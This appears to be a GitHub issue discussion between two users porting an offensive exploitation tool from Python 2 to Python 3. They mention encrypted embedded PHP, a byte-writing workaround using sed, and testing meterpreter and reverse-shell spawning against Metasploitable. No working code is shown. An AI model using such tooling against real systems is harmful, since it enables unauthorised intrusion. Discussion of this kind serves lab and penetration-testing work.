Query:

[NovaCygni]

Just glanced over the code, nice job looks very good overall, though I was curious as to why you went with Python2 not Python3?

[z0noxz]

Haven't "got the time" to convert it yet. Maybe I'll have a look tomorrow. Initially I think I went for backwards capability, but I think almost everyone have py3 now... so probably not a good argument :)

[NovaCygni]

Well from a quick check, you can likely just 2to3 the code, sort out the few issues with change to syntax for the 'Expected type Dict got List:Dict instead" it should be ready to go. Nice projects btw nice to see people being innovative.

[z0noxz]

So I begun the conversion from py2 to py3, but doing so I found an error or security feature preventing the "echo -ne" from working. So I have started to change this method to first echoing 0x00,0x01... to the server and then loop 0-255 converting each hex to ascii using sed. This seems to work, and I would perhaps have a new version ready in a few minutes or an hour using this method and py3.

[z0noxz]

Quick update: I found some strange errors in the embedded PHP-code that took me forever to identify (due to it being encrypted). I think they are related to a newer version of PHP (in regards to HTTP-variables not allowed to contain '_') which is different then the one in metasploitable that I have been testing on before. So I haven't completed the py2->py3 yet due to this obstacle, but hopefully tomorrow!

[z0noxz]

So I have ported the code to python3. I had to do a lot of changes to get it running, and then some more to get the external payloads to execute correctly. I have tested meterpreter and reverse shell spawning (it works, though I had to change rev-shell to 'bash' instead of 'sh'). I currently don't have my lab environment up and running so I haven't been able to test everything as my own environment don't allow a lot of the exploits (pew).

[NovaCygni]

Ill fire it up and test it now +1

[NovaCygni]

OK well good and bad news, Good news is its "Mostly" working the bad news is theres still a few minor errors, if you want I can Pastebin the souce code with ##+Error## for you... its mostly little things like: Unresolved Attribute reference for Class Linux/Windows, Unresolved attribute for self.socket for class shell Or feel free to pop into the IRC Blackarch channel and I can just talk you through it.

[z0noxz]

Drop a pastebin, I have some errands to run. Maybe I see you at the IRC later.

[NovaCygni]

https://pastebin.com/pZuRz7rp Ive added #+Error# To every line/section with errors, after a quick check with Pycharm turns out you have more than a few errors, with 3 maybe 4 critical ones. Anyhows Ill see you at the IRC Channel and talk you through it then... its all trials and tribulations I had to go through myself back in the day :+1:

[z0noxz]

Nice, I'll have a look later. Pycharm seems to do a good job at finding errors.

[NovaCygni]

Yeh really you should be using it, itll save you a TON of time and its exceptional for debugging scripts, even more so when you start playing around with Async code ;o

[z0noxz]

I only use nano in one terminal and run the script in one terminal... so yeah Pycharm might help me a bit XD